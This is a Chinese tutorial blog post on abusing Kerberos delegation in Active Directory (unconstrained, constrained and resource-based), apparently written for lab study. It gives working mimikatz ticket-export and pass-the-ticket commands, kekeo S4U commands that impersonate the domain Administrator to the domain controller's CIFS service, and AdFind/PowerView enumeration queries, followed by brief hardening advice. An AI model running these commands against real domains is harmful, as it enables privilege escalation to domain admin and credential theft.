首页 > 其他分享 >域内委派攻击

域内委派攻击

时间:2023-01-31 19:35:00浏览次数:40  
标签:委派 exe 攻击 evil 约束 test com

域委派是指,将域内用户的权限委派给服务账号,使得服务账号能以用户权限开展域内活动。利用委派可获取域管理员权限

域委派主要分为三种:

  • 非约束性委派

  • 约束性委派

  • 基于资源的约束性委派

在Windows系统中,只有服务账号和主机账号的属性才有委派功能,普通用户默认是没有的。 

 

01、非约束委派攻击

设置非约束委派

主机账号设置非约束委派:

活动目录中的computers组内的计算机,双击计算机名进行属性设置。

 

服务账号设置非约束委派

1、注册 SPN

setspn -U -A https/web  test

 

 2、将test设置为非约束委派。

 

 非约束委派攻击利用

 从攻击者的角度看,如果攻击者拿到一台配置了非约束性委派的机器权限,就可以诱导域管理员访问这台机器,得到域管理员的TGT,从而拥有域管理员的权限。

(1)域管理员访问非约束委派主机的服务

net use \\WIN-CIFJV1AK3T6.evil.com

 (2)在非约束性委派主机上,使用mimikatz导出票据。

mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

 (3) 使用mimikatz将票据注入内存,访问域控C盘共享目录中的文件。

 

 查找非约束委派

1、Adfind

下载地址:https://www.softpedia.com/get/Programming/Other-Programming-Files/AdFind.shtml

查询非约束委派的主机账户:

AdFind.exe -b "DC=evil,DC=com" -f "(&(samAccountType=805306369) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

查询非约束委派的服务账户

AdFind.exe -b "DC=evil,DC=com" -f "(&(samAccountType=805306368) (userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName

 

2、PowerView

查询非约束委派的主机账户

Get-NetComputer -Unconstrained -Domain evil.com 

 

查询非约束委派的服务账户

Get-NetUser -Unconstrained -Domain evil.com | select name

 

 

 

02、约束委派攻击

设置约束委派

setspn -U -A cifs/test  test

 

 

 

 约束委派攻击利用

 最常见的攻击思路,获取了服务账号test,那么就可以伪造域内任意用户访问 DC 的 cifs服务。

构造服务账户test的票据
kekeo.exe "tgt::ask /user:test /domain:evil.com /password:abc123! /ticket:test.kirbi" "exit"

利用刚才伪造的票据,向域服务器申请CIFS服务票据
kekeo.exe "tgs::s4u /tgt:[email protected][email protected] /user:[email protected] /service:cifs/WIN-DC01.evil.com" "exit"

使用mimikatz将该票据注入当前的会话中
mimikatz.exe "kerberos::ptt [email protected]@[email protected]" "exit"

 

 # 访问目标共享盘

dir \\win-dc01\c$

 

 

 

 查找非约束委派

ADFind

# AdFind.exe查询约束委派机器账户
AdFind.exe -b "DC=redteam,DC=lab" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

# AdFind.exe查询约束委派服务账户
AdFind.exe -b "DC=redteam,DC=lab" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

PowerView

# PowerView查询约束委派机器账户
powershell Get-DomainComputer -TrustedToAuth -domain redteam.lab -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|ft -Wrap -AutoSize

# PowerView查询约束委派服务账户
powershell Get-DomainUser –TrustedToAuth -domain redteam.lab -Properties distinguishedname,useraccountcontrol,msds-allowedtodelegateto|fl

 

 

03、基于资源的约束委派攻击

 

 

 设置属性值并查询

Set-ADUser krbtgt -PrincipalsAllowedToDelegateToAccount test
Get-ADUser krbtgt -Properties PrincipalsAllowedToDelegateToAccount

 

 

 

 

 

 

防范措施

 1、高权限的用户,设置不能被委派。

2、主机账号需设置委派时,只能设置为约束性委派。

 

 

 

 

 

 

 

参考连接:

 https://www.cnblogs.com/first-kiss/articles/16212857.html#%E9%9D%9E%E7%BA%A6%E6%9D%9F%E5%A7%94%E6%B4%BE%E6%94%BB%E5%87%BB%E5%88%A9%E7%94%A8

普通域用户帐号加域权限&授权特定普通域用户加域权限 

 http://wjhsh.net/airoot-p-14827626.html

https://blog.csdn.net/mooncarp/article/details/127926435

标签:委派,exe,攻击,evil,约束,test,com
From: https://www.cnblogs.com/xiaozi/p/17072605.html

相关文章

  • 从Web服务器的攻击防御工具HttpGuard(防cc攻击等)看Web服务器的反爬虫设置 —— 如何
    HttpGuard网址:https://github.com/centos-bz/HttpGuard   从https://vv1234.cn/archives/243.html可知,如果同个IP的访问在一定时间内超过一定数量那么就会被判为......
  • 委派模式——从SLF4J说起
    作者:vivo互联网服务器团队-Xiongyangxin将某个通用解决方案包装成成熟的工具包,是每一个技术建设工作者必须思考且必须解决的问题。本文从业内流行的既有工具包入手,解......
  • vue.js客服系统实时聊天项目开发(十)过滤xss字符内容-防止xss攻击
    我们在发送消息给用户的时候,都要进行过滤xss字符,xss是跨站脚本攻击,实质上就是发送了html或js代码,现在我们在vue项目中对内容进行一下过滤在vue中安装如下:npminstallxs......
  • 内网渗透之中间人欺骗攻击
    ARP攻击协议简介ARP全称为AddressResolutionProtocol,即地址解析协议,它是一个根据IP地址获取物理地址的TCP/IP协议,主机发送信息时将包含目标IP地址的ARP请求广播到网络上......
  • Java类加载器与双亲委派机制
    类加载器顶级类加载器:BootStrapClassLoader负责加载%JAVA_HOME%路径下lib文件夹中的jar包和class文件扩展类加载器:ExtClassLoader负责加载%JAVA_HOME%路径下lib文件夹......
  • XSS攻击是什么
    攻击者可以通过向Web页面里面插入script代码,当用户浏览这个页面时,就会运行被插入的script代码,达到攻击者的目的。XSS的危害一般是泄露用户的登录信息cookie,攻击者可以通过c......
  • CSRF攻击是什么
    CSRF攻击的过程原理是:-用户打开浏览器,访问目标网站A,输入用户名和密码请求登录-用户信息在通过认证后,网站A产生一个cookie信息返回给浏览器,这个时候用户以可正常发送请......
  • 缓冲区溢出攻击
    首先为了方便观察汇编语句,需要在32位环境下进行操作,首先在Kali中安装相关编译应用:输入命令linux32进入32位linux环境,输入/bin/bash使用bash,使用exit退出linux32位环境......
  • RSA dp泄漏攻击
    dp泄漏攻击给n,e,dp,c\[\begin{array}{l}&&&&&&&&&&&&&\\dp\equivd(\bmod(p-1))\\\becausedp\cdote\equivd\cdote\equiv1(\bmod(p-1))\\\th......
  • 网站总被攻击?写个自动封禁 IP 的脚本 转载
     链接:https://blog.csdn.net/qq_38925100/article/details/123742463个人网站总被攻击?写个自动封禁IP的脚本给你!具体如下:1.在ngnix的conf目录下创建一个 blockip.co......